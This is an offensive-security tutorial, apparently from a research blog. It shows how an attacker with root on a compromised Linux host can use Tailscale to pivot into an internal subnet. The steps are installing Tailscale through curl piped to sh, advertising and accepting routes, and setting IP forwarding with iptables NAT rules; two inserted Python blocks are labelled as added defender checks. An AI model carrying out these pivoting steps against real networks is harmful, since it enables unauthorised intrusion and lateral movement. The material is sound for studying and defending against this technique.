Bipolar Disorder: Pivoting with TailScale
Pivoting is used in a post-exploitation context and has many techniques. In this article I will also demonstrate the ability to move around the network using TailScale.
Caster - Bipolar Disorder
Genre: Offensive, Experimental
Label: exploit.org
Release Date: 15 November 2024
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Cover Edit: Caster
https://blog.exploit.org/caster-bipolar-disorder
Intro
TailScale is a VPN solution based on the WireGuard protocol that solves many problems related to NAT and network complexity. Due to its speed and convenience, this tool can be used by attackers to infiltrate networks and create virtual connections, allowing them to bypass restrictions and reach hidden network segments.
In this article, I will demonstrate how an attacker can use TailScale to gain a foothold in a compromised network and then move on to other subnets, bypassing NAT restrictions and minimizing the possibility of detection. We will focus on attacking a compromised Linux host using TailScale to create bridges between networks.
Disclaimer
This article is of an introductory nature and is intended solely for information security specialists conducting testing within the framework of concluded contracts. The author and the editorial staff are not liable for any damage caused by the use of the information presented. The distribution of malware, disruption of systems and confidentiality of correspondence is a violation of the law and may result in criminal liability.
TailScale Intro
TailScale is a solution designed to create virtual networks between devices and is an analog of the well-known ZeroTier. Its key feature is its ease of use and automatic setup of connections between nodes without the need for complex configuration.
Key features of TS include:
- Ease of use: TailScale automatically manages encryption keys and connection setup, eliminating the need for manual configuration. This allows users to easily deploy a network with minimal technical effort;
- NAT traversal: One of TailScale's main advantages is its ability to bypass NAT and other network restrictions. This is accomplished through tunneling technology, making it ideal for remote access to systems behind routers and firewalls;
- Versatility: TailScale supports a wide range of routing and network access control capabilities. For example, it can be used to announce routes to local networks and make them available to other devices on the TailScale network. Speaking of which, this nuance will be used by the attacker in this paper;
- Cross-platform: TailScale supports multiple platforms including Windows, Linux, macOS, iOS and Android, allowing it to be used on almost any device. This makes it convenient for both personal use and corporate needs;
- Flexibility in network management: TailScale offers flexible customization through its management console, where you can easily add new nodes, manage permissions and monitor activity.
To get started with TS, you must register an account.
This is done very simply, so I will not describe the process in detail.
Scenario
The following scenario will be covered in this article. An attacker from the Internet has compromised a Linux machine and, after privilege escalation, holds root privileges on it. The compromised machine itself has two interfaces, and the attacker's task will be to gain access to the infrastructure behind eth1.
This will be accomplished by installing TailScale on the attacker's and the compromised machine's systems, configuring routing and NAT.
| Host | Address | Operating System |
|---|---|---|
| Attacker | 100.X.Y.Z (TailScale Virtual Link) | Kali Linux 2024.3 |
| Victim | 100.X.Y.Z (TailScale Virtual Link) | Debian 12 |
| RB7 | 172.16.150.223/24 | Windows 10 Enterprise LTSC |
| RB8 | 172.16.150.221/24 | Windows 10 Enterprise LTSC |
| RB9 | 172.16.150.224/24 | Windows 10 Enterprise LTSC |
| RB10 | 172.16.150.226/24 | Windows 10 Enterprise LTSC |
Remarks
- This is a scenario in which the attacker is on the Internet and has compromised the host behind the NAT;
- Root privileges are required to install TS.
TS Deploying (Compromised Host)
First, TailScale must be installed on the compromised machine. This is accomplished by downloading a special .sh file and then executing it:
```
root@compromised:~# curl -fsSL https://tailscale.com/install.sh | sh
```
Then you need to activate the TS operation, this is done with one simple command:
```
root@compromised:~# tailscale up
```
After this action, a link will be generated to connect the compromised machine to the TailScale virtual network:
```
root@compromised:~# tailscale up
To authenticate, visit:
https://login.tailscale.com/a/10ec90a1013477
```
After clicking on the “Connect” button - the compromised machine has successfully connected to the TailScale network.
```
root@compromised:~# tailscale up
To authenticate, visit:
https://login.tailscale.com/a/10ec90a1013477
Success.
```
This can be verified from the TS control panel:
After installing and running TailScale, a virtual interface tailscale0 will appear on the compromised machine; it is the interface used for the TS virtual network:
```
4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 100.77.225.125/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ae01:e17d/128 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::231a:9bfb:31a6:f5b3/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
```
Now it is necessary to announce the route. According to the network diagram, behind the compromised machine is interface eth1 with an address in the range 172.16.150.0/24.
This route announcement is necessary so that the attacker, when connecting to the TS network, will automatically receive this route and be able to communicate with the internal infrastructure using it. This is done simply, in two commands:
```
root@compromised:~# tailscale down
root@compromised:~# tailscale up --advertise-routes=172.16.150.0/24
```
The TS service is first shut down and then brought up with the --advertise-routes argument for the 172.16.150.0/24 subnet.
After restarting TS with the --advertise-routes argument, you must go into the settings of the compromised machine in the control panel and approve this announcement:
This completes the initial installation of TailScale on the compromised machine. I'll come back to the routing and NAT settings a bit later, now we need to do the identical steps on the attacker's machine.
Why use 100.X.Y.Z addresses?
Tailscale automatically assigns each device on its network a unique IP address. These addresses belong to a range of addresses defined in RFC 6598 known as Carrier-Grade NAT.
CGNAT addresses are taken from the special IPv4 range 100.64.0.0/10, which covers 100.64.0.0 to 100.127.255.255. They are special-purpose addresses (RFC 5735), similar to private IP addresses such as 10.0.0.0/8 or 192.168.0.0/16.
Tailscale uses addresses from the CGNAT range for several reasons:
- These addresses have little or no overlap with ranges commonly used on private networks, such as 10.0.0.0/8 or 192.168.0.0/16;
- CGNAT addresses are suitable for intermediate traffic that requires additional NAT before reaching the Internet. This coincides with how Tailscale's NAT mechanism operates.
The use of CGNAT allows Tailscale to operate effectively without conflict with existing networks.
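As an added example (not part of the original article), a small Python check a defender can run over `ip addr` output to spot a host that has joined a Tailscale network: it flags any interface holding an address from the CGNAT block above or from the fd7a:115c:a1e0::/48 ULA prefix seen on tailscale0 earlier. The sample output is constructed; the eth1 address in it is made up.

```python
import ipaddress
import re

# Ranges that mark a Tailscale node: the CGNAT block (RFC 6598) from which
# Tailscale assigns IPv4 addresses and the ULA prefix it uses for IPv6.
TAILSCALE_RANGES = (
    ipaddress.ip_network("100.64.0.0/10"),
    ipaddress.ip_network("fd7a:115c:a1e0::/48"),
)

# Constructed sample of `ip addr` output from a host running tailscaled;
# the eth1 address is made up, the tailscale0 block mirrors the article.
SAMPLE_IP_ADDR = """\
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff
    inet 172.16.150.10/24 brd 172.16.150.255 scope global eth1
4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 100.77.225.125/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ae01:e17d/128 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::231a:9bfb:31a6:f5b3/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
"""

IFACE_RE = re.compile(r"^\d+:\s+([^:@]+)[@:]")  # "4: tailscale0: <...>"
ADDR_RE = re.compile(r"^\s+inet6?\s+(\S+)")     # "    inet 100.77.225.125/32 ..."


def find_tailscale_addresses(ip_addr_output):
    """Map interface name -> addresses that fall inside a Tailscale range."""
    findings = {}
    current = None
    for line in ip_addr_output.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = ADDR_RE.match(line)
        if m and current is not None:
            addr = ipaddress.ip_interface(m.group(1)).ip
            # A v4 address tested against the v6 network simply yields False.
            if any(addr in net for net in TAILSCALE_RANGES):
                findings.setdefault(current, []).append(str(addr))
    return findings
```

The same parser works on a fleet-wide `ip addr` collection, since the interface name is not trusted: a renamed interface with a 100.64.0.0/10 address is still reported.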
TS Deploying (Attacker Host)
Same old same old: downloading and executing the sh-script:
```
caster@kali:~$ sudo curl -fsSL https://tailscale.com/install.sh | sh
```
Then TS service activation:
```
caster@kali:~$ sudo tailscale up
To authenticate, visit:
https://login.tailscale.com/a/1506661201d021
```
Connecting Kali to the TailScale virtual network:
After clicking on the “Connect” button - the attacker's machine will connect to the TS network:
Kali will also get its own virtual tailscale0 interface for working with the virtual network:
```
3: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 100.97.65.120/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::ff01:4178/128 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::8519:d82:f240:e9bf/64 scope link stable-privacy proto kernel_ll
       valid_lft forever preferred_lft forever
```
However, since we previously configured route announcement, we need to restart TailScale on the attacker's machine with the --accept-routes argument:
```
caster@kali:~$ sudo tailscale down
caster@kali:~$ sudo tailscale up --accept-routes
```
The attacker will then be able to reach 172.16.150.0/24 using this route.
What is noteworthy is that the operating system itself does not show a route for 172.16.150.0/24 in its main routing table (Tailscale keeps its routes in a separate policy-routing table), yet routing through TS works.
Routing, NAT
The routing and NAT configuration stage is key to the successful operation of the tunnel. It allows you to redirect traffic between network interfaces and correctly handle packets coming from different hosts. Here we will use three basic commands, each of which performs an important function in the routing and NAT configuration process.
Forwarding
First, you need to enable kernel-level routing by enabling packet forwarding. This is accomplished with the following command:
```
root@compromised:~# sysctl -w net.ipv4.ip_forward=1
```
This command modifies the ip_forward parameter, which allows IP packets to be forwarded between interfaces on this host. Without this step traffic will not be forwarded at all, so it is a prerequisite for every routing and NAT configuration.
FW Rules
Now we need to create forwarding rules with iptables so that the Tailscale tunnel works correctly. These rules determine how packets are handled when they are forwarded between interfaces:
```
root@compromised:~# iptables -A FORWARD -i eth1 -o tailscale0 -m state --state RELATED,ESTABLISHED -j ACCEPT
root@compromised:~# iptables -A FORWARD -i tailscale0 -o eth1 -j ACCEPT
```
Rules Breakdown
- The first command allows forwarding of traffic that belongs to connections initiated from the remote side and is returning through the tunnel. It checks the connection state and accepts packets in the RELATED,ESTABLISHED state, which is needed to keep already existing sessions working;
- The second command allows all packets entering from the tailscale0 interface and leaving via eth1 to be forwarded, giving access to the network resources behind NAT.
To complete the routing and NAT configuration, add one more rule for masquerading so that traffic forwarded into the 172.16.150.0/24 subnet, which represents the target infrastructure, leaves with the compromised host's own address as its source. Packets for that subnet exit through eth1, and the hosts behind it have no route back to the 100.X.Y.Z addresses, so the source NAT must be applied on eth1:
```
root@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -d 172.16.150.0/24 -j MASQUERADE
```
These rules allow the tunnel to operate transparently, redirecting traffic between interfaces and allowing devices on both sides of the network to see each other.
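As an added example (not from the article), a Python audit a defender can run over the output of `sysctl net.ipv4.ip_forward` and `iptables-save` to recognise the forwarding-plus-NAT pattern configured in this section on a Linux host. The sample dump is constructed and mirrors the rules above; the `tunnel_iface` parameter is an assumption of this example.

```python
import re

# Constructed sample input: the output of `sysctl net.ipv4.ip_forward` and an
# `iptables-save` dump of a host configured with the rules from this section.
SAMPLE_SYSCTL = "net.ipv4.ip_forward = 1"
SAMPLE_IPTABLES_SAVE = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A FORWARD -i eth1 -o tailscale0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i tailscale0 -o eth1 -j ACCEPT
COMMIT
*nat
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -o eth1 -d 172.16.150.0/24 -j MASQUERADE
COMMIT
"""


def _opt(rule, flag):
    """Value following a single iptables option such as -i, -o or -j (None if absent)."""
    m = re.search(rf"(?:^|\s){re.escape(flag)}\s+(\S+)", rule)
    return m.group(1) if m else None


def audit_forwarding(sysctl_line, iptables_save, tunnel_iface="tailscale0"):
    """Summarise whether the host can route and NAT traffic arriving from an overlay interface."""
    report = {
        "ip_forward": sysctl_line.split("=")[-1].strip() == "1",
        "forward_accepts": [],   # (in_iface, out_iface) ACCEPT rules touching the tunnel
        "masquerade_out": [],    # interfaces carrying a MASQUERADE rule in the nat table
    }
    table = None
    for line in iptables_save.splitlines():
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A "):
            in_if, out_if, target = _opt(line, "-i"), _opt(line, "-o"), _opt(line, "-j")
            if (table == "filter" and line.startswith("-A FORWARD")
                    and target == "ACCEPT" and tunnel_iface in (in_if, out_if)):
                report["forward_accepts"].append((in_if, out_if))
            elif table == "nat" and target == "MASQUERADE":
                report["masquerade_out"].append(out_if)
    # ip_forward on plus an ACCEPT for packets entering from the tunnel is the
    # subnet-router pattern; MASQUERADE additionally hides the remote source.
    report["pivot_capable"] = report["ip_forward"] and any(
        i == tunnel_iface for i, _ in report["forward_accepts"])
    return report
```

On the internal segment this configuration is also visible indirectly: every connection from the attacker arrives at 172.16.150.x hosts with the compromised machine's eth1 address as its source, so unexpected scan or SMB activity from that one address is the network-side counterpart of this host-side check.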
Impact
After all the configurations, the attacker has connectivity to 172.16.150.0/24. To clearly demonstrate the impact of this pivoting method, I will demonstrate a couple of utilities.
NetExec
Port Scan
Proof of traffic flow through TS
As you can see in the screenshot, traffic for the 172.16.150.0/24 network successfully passes through the TailScale node.
Outro
Tailscale is a tool for building secure networks on top of the Internet. It provides easy setup, automatic routing, and secure connectivity between devices without the need for complex configuration. However, like any other technology, Tailscale can be used for unexpected purposes.
In the hands of an attacker, Tailscale becomes an unusually effective tool for pivoting. Using its routing, NAT and automatic NAT piercing capabilities, an attacker can easily penetrate internal networks and pass traffic between different segments while remaining invisible to standard defense mechanisms. For example, a properly configured Tailscale tunnel can be used to gain access to private resources and infrastructures that would be inaccessible using traditional VPNs.
It is important to note that using Tailscale for pivoting is a very specific piece of research that differs significantly from traditional methods. It requires a deep understanding of networking, NAT technologies, and detailed configuration of routing and firewalls. This makes the approach more complex, but also more sophisticated, giving the attacker unique opportunities to penetrate the target networks.